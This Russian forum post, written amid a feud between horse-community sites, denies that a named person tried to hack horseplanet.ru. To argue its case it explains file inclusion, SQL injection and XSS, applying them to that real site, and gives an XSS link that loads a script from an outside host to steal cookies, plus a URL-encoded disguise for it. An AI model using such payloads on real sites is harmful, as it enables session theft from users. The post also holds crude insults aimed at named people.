Итак. Продолжаем исследовать и выискивать "ляпы" наших любимых и неподражаемых последователей ОЭН.
Задаюсь вопросом - где еще можно накосячить? С лошадьми? С лошадьми накосячили только так. последователи ОЭН вкупе с гуру наплодили столько глюков, что ой-ой!
Оказывается, они косячат не только с лошадьми...но и с сетью! На вид вполне адекватные(а адекватные ли? - прим.мозга.) говорят такую чушь!
Выдают желаемое за действительность такую лажу! Что становится стыдно. Впрочем, все по порядку. Вот текст admina с ЧП.
Цитата:
Как оказывается владельцы
www.equestrian.ru давно уже точат зуб на Планету лошадей.
Видимо задело их за живое, не могут они так просто сидеть и смотреть... Пытаются что то делать...
А вопли побирушки о том, что ее ящики были взломаны натолкнула их на мысль.
Сегодня днем была зафиксирована попытка взлома Планеты лошадей и не кем нибудь из кучки больних хор.срушником, а самой госпожой Екатериной Штатновой, которая является пресс-секретарем Федерации конного спорта России. Так же она является одним из основателей (вместе с Михаилом Браво и Александром Кочетовым) сайта «Мой друг - лошадь», ныне "Конное обозрение" (
www.equestrian.ru)
Попытки взлома были были пресечены системой безопасности сайта, а данные о попытках взлома сайта были запротоколированы системой.
Теперь у нас имеется полная доказательная база (отчеты системы безопасности и другие неопровержимые доказательства) о том, что данная попытка была имела место.
Читая эти строки хотелось одновременно ржать от смеха, понимая, какую чушь сморозил админ, либо плакать, ужасаясь тем, что они откровенно пользуются незнанием структуры сети.
Пожалуй, я объясню все. чтобы вы поняли одну вещь: Никакой "атаки" на планету г. Екатериной Штатновой не было. Да и сама атака ставится под сомнение.
Рассуждать буду с точки зрения хакера. Так как эта точка зрения
для меня наиболее оптимальна, да и Вы больше поймете.
Итак, небольшое вступление.
Что значит атака на сайт? Каким образом проводится атака и что сдедует их этого.
Чтобы совершить атаку на сайт, взломать сервер, получить неограниченные привилегии на нем, и иметь полный доступ к сети - нужны
а) прямые руки
б) Нормальные, думающие мозги
в) Пару тройков эксплоитов(специальных программ написанных на языках perl, php, реже С и С++, которые используются по время взлома)
Чтобы взломать сайт - нужно по крайней мере сначала найти уязвимость. В зависимости от системы и программ установленных на сайте - подбирается нужная база уязвимостей. Например, у phpbb2 больше всех "дыр" и следовательно больше возможностей можно провести атаку.
Помимо этого есть еще "общие дыры" в системе. Такие как php-including, sql-injechion, xss-атака, попытка выполнения произвольного кода на портах и пр.
Пройдемся по порядку.
Эксплоиты для демоновКак утверждает админ, Екатерина Штатнова, пыталась атаковать сайт. Самые первые действия при атаке?
Знающие скажут - сканирование системы и будут правы. Прежде чем лезть на рожон, Е.Ш. просканирует открытые порты. Тем более, если она решилась на взлом. То обзавелась прокси-сервером и полезла бы щупать сайт.
К слову - сканирование портов тоже является разновидностью хакерской атаки. Забегая вперед, думаю, что именно этим и занималась Е.Ш.
Просканировав, и определив порты, она узнала, какие висят демоны. Следовательно, для них нужно искать эксплоиты.
Писав статью, я пытался действовать так же как и Е.Ш. И пробывать виды атак.
Глянув, какие порты на самом деле открыты и что за сервисы там висят, я стал искать эксплоиты в публичных источниках.
Найдя, я сразу отложил такой вариант атаки.
Половина была написана для использования под Linyx. Другая требовала компилиции и превращения в бинарник.
Женщине, а имено уважаемому человеку Екатериной Штатновой лазит по хак порталам, искать сплоиты и компилировать, а потом пытатся использовать их против ЧП - думаю, нет смысла. И так дел много. А тут качай комплилятор, загружай дополнительные библиотеки..Это самый сложный вид атаки для новичка.
Если бы так оно и было - г. Штатнова наняла бы профессионального хакера, а не мучалась сама. Разберем наиболее самые известные атаки на сайт. Неизвестные лежат либо в привате, либо г. Екатерина( или кто там) о них даже не догадывается.
php-includingЭтот тип атаки обозначает как - произвольное выполнение команд на сервере. Как определяется данная уязвимость? Заходим на хрюкпланету, в любую ссылку, в любой раздел...видим в строке браузера -
Код:
http://horseplanet.ru/index.php?name=Forums&file=[b]viewtopic&t[/b]
И меняем на
Код:
http://horseplanet.ru/index.php?name=Forums&file=[b]adminlol[/b]
Если в результате этого шаманства у нас выскочила ошибка типа: Warning: main(): Failed opening 'dsdsds.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/share/pear') in /home/user/www/page.php on line 3
То перед нами банальный инклуд. Создаем небольшой шелл на бесплатном хостинге, и прикручиваем к сайту. А дальше..
Но на хрюпланете инклуда нет. Следовательно, сама возможность этой атаки невозможна!
sql-injechionЭтот тип атаки обозначает уязвимость, путем НЕ фильтрации спецсимволов в строке браузера. Из-за чего можно получить приватные данные касающиеся Базы Данных, паролей, Е-mall и пр.
Как находят эту уязвимость?
А просто. к строке типа
Код:
http://horseplanet.ru/index.php?name=Forums&file=viewtopic&t
подставляют кавычку или спецсимвол таким образом
Код:
http://horseplanet.ru/index.php?name=Forums&file=viewtopic&-t"
если фильтрует - значит такая атака невозможна. И Екатерина Штатнова никак не могла попытаться взломать сайт таким образом. Система нас будет откидывать на главную страницу, не более.
xss-атака Этот метод атаки предназначается не на сервер, а на пользователей сервера, то есть на простых юзеров, которые пользуются им.
Атаку можно совершить используя недостаток сервера в фильтрации входных значении на 80 порту апача..так, уже не туда еду
Вкрадце, для того, чтобы совершить такую атаку, нужно найти xss - определить пассивная она или активная(склоняюсь,что пассивная, так как при активной Админ вряд ли что заметил) Пассивная заставляет пользователя перейти по заранее ядовитой ссылке, и сохраняет на левом сайте куки заходящего.
Ссылка должна выглядеть примерно так -
Код:
http://horseplanet.ru/index.php?name='><script src=http://luzer.h16.ru/script/js.js></script>
где обращаетса к http://luzer.h16.ru/script/js.js.
Конечно, если давать в таком виде - слишком подозрительно, номожно скрыть ее например так:
Код:
%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
Не очень подозрительно, согласитесь.
но все же повторюсь - это атака не на сайт, а на пользователей сайта.
Два абсолютных разных значения. Уверен, Покоев Сергей имел ввиду не это.
Что же было? Была ли попытка атаки?
Честно скажу, не знаю. Может, была, а может и выдумано как всегда. Как описано ниже(история с троянами)
Но уверен точно, если и была попытка типа: "Я крутая! Я сайт взломаю!" Точно не Е.Ш.
Почему не она? Да все просто.
Ip.
Администратор, учитывая полнейшее незнание сетевой строения интернета - воспользовался этим и выдал желаемое за действительное.
Во первых. Для выяснения хозяина ай-пи нужно написать заявление в милицию. Милиция позвонит к провайдеру. Провайдер звякнет АТС - и лишь последняя, при предъявлении соответствующей бумажонки назовет домашний адрес и телефон "хакера"
Далее милицонеры толпой направляются домой к "хакеру". Составляют акт. Опечатывают компьютер, допрашивают человека - и все на все уходит..больше ОДНОГО месяцев!
Администратор хрюкпланеты, мало того, в невероятные короткие сроки, без суда и санкции - смог определить чей это ай-пи, так еще и утром написать короткий постик с заголовком "тайная война..."
И это не единственный случай.
Цитата:
Я повыкидывал, разумеется, ссылочки на сайт Боглика и впредь предупреждаю, что любые ссылки на любой чужой сайт будут караться намедленным баном.
Дело не в содержании сайта.
Оно банально.
Три онаниста ( Боглик, Рейтер,и девушка Пилигрим, которая тут выла и желала кому-нибудь отдаться) дрочат себе под нос что-то про ненависть к АГ.
Пусть дрочат, ничего страшного или интересного. Или нового.
Обычное собрание графоманов-онанистов-невзорофреников, свихнувшихся на ненависти к АГ.
Пусть хоть удрочатся до обмороков, нам ни жарко ни холодно. Процесс не остановят ни они ни другие онанисты-одиночки.
сссылочку можно было бы и оставить.
Ну корчатся они там, ну показывают, как им больно и страшно...спасибочки, парни, приятно выяснить, КАК велик ваш ужас....
Можно бы и сходить. Я бы сам водил экскурсии, так как радует там все глаз мой.
НО! Наша служба безопасности выяснила,что каждое посещение сайтика Боглика -снабжает ваш комп массой троянов и других вирусов. Юный онанист играет в хакера и набрав кучу бесплатной заразы с сайтов типа хакер.ру.- нствил на своем сайтике "ловушки" для посетителей. Ну торчит сейчас этот подросток от этого, ну тащится пацан от дешевого хакерства.
Открывая любую тему -вы заражаете свой комп. Чистить придется все. Некоторые из вирусов особо злые - и чистка обойдется дорого. Троянчики воруют у вас пароли ваших мыл и личек, в частности.
Так что, кто уже, что называется , "Был" чистить рекомендую все.
Если уж совсем невмоготу и хочется поржать над потугами онанистов - ходите не со своего компа! лучше с компа врага или начальника.
Идиотское, откровенно развратное содержание больного человека мы опускаем. Оно не интересно.
Это чудо, создало пост и на весь интернет начало кричать, что, на
http://karfagen.flybb.ru - происходит заливка троянов на компьютеры жертвы...Так ли оно на самом деле?
Сейчас проверим.
Трояны заливаются с сайта двумя способами -
1) Когда вы скачиваете файл, а вместо файла скачивается и троян.
2) Путем специально внедренного в сайт зловредного скрипта, который в свою очередь скачивает троян или перенаправляет его на на "логово".
при заходе на Карфаген - никаких файлов я не заставляю скачивать. Переходим к 2 способу.
Чтобы внедрить зловредный код в страницу, надо иметь как минимум доступ к серверу. Или взломать его на худой конец.
Ни того, ни другого у меня нет.
Вот и все объяснение. Хостинг форум flybb НЕ предоставляет хостинг php скриптов. Туда невозможно загрузить никакой посторонний объект. Если не верите, можете попытатся.
Можете спросить у главного администратора - он подвердит мои слова.
Можно проверить сайт онлайн-анивирусов. Собственно говоря, можно сделать 100 вещей, которые определяют зловредные программы.
В конце концов, можно поставить самую параноиналью систему, активировать самые лучшие антивирусы и фаерволлеры..
И вы все равно ничего не найдете.
Потому что их тут нет.
И все эти сказочки про вирусы и трояны в мою сторону..это всего лишь сказочки.
Такая же была ситуация, когда меня обвиняли в засылке троянов девушке.
Полный бред.
Хочется спросить, отчего тогда меня не арестовали, не предъявили претензии и почему именно троянщиком стал я?
Хотя, догадываюсь, почему.
Потому что слишком много знаю о сетевой безопасности, и они пользуюясь этим скидывают всю "кашу" на меня.
Так-то друзья. Мы в очередной раз четко и ясно доказали, что аргументов у этих господ нет.
Если появятся новые "ляпы" с удовольствием размещу их здесь.